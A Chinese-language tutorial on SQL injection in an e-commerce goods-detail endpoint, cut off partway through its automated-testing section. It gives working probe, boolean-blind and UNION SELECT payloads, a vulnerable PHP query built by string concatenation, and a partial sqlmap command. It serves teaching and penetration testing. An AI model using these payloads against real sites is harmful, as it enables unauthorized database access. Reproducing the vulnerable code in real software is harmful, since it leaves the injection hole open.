免责声明 本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。

目录

一、漏洞概述

二、漏洞复现步骤

三、技术原理分析

四、自动化渗透测试

五、漏洞修复方案

六、企业级安全建议

七、扩展攻击场景

八、漏洞POC

---

一、漏洞概述

• 漏洞类型：SQL注入（CWE-89）
• 风险等级：高危（CVSS 3.1评分可达9.8）
• 影响模块：商品查询接口（如/goods/detail）
• 攻击向量：通过构造恶意商品ID参数篡改SQL查询数据

---

二、漏洞复现步骤

1. 探针请求
   使用单引号测试参数过滤机制：

GET /goods/detail?id=1' HTTP/1.1 

• 预期响应：

  • 若返回数据库错误（如You have an error in your SQL syntax），说明存在注入点
  • 若页面正常显示，需进一步验证是否为盲注

• 布尔盲注验证
  构造布尔条件测试：

# 条件为真 
GET /goods/detail?id=1' AND '1'='1 HTTP/1.1 # 条件为假 
GET /goods/detail?id=1' AND '1'='0 HTTP/1.1 

• 对比页面差异：真条件应返回正常商品信息，假条件可能导致内容缺失或提示"商品不存在"

• 联合查询注入获取数据

GET /goods/detail?id=-1' UNION SELECT 1,version(),3,4-- -

三、技术原理分析

脆弱代码示例（PHP）：

// goods.php  
$id = $_GET['id'];
$sql = "SELECT * FROM goods WHERE id = $id";
$result = mysqli_query($conn, $sql);

漏洞成因：直接将用户输入的id参数拼接到SQL语句，未进行类型转换或过滤。

---

四、自动化渗透测试

使用sqlmap进行自动化检测：

sqlmap -u "http://target.com/goods/detail?id=1"  --batch --risk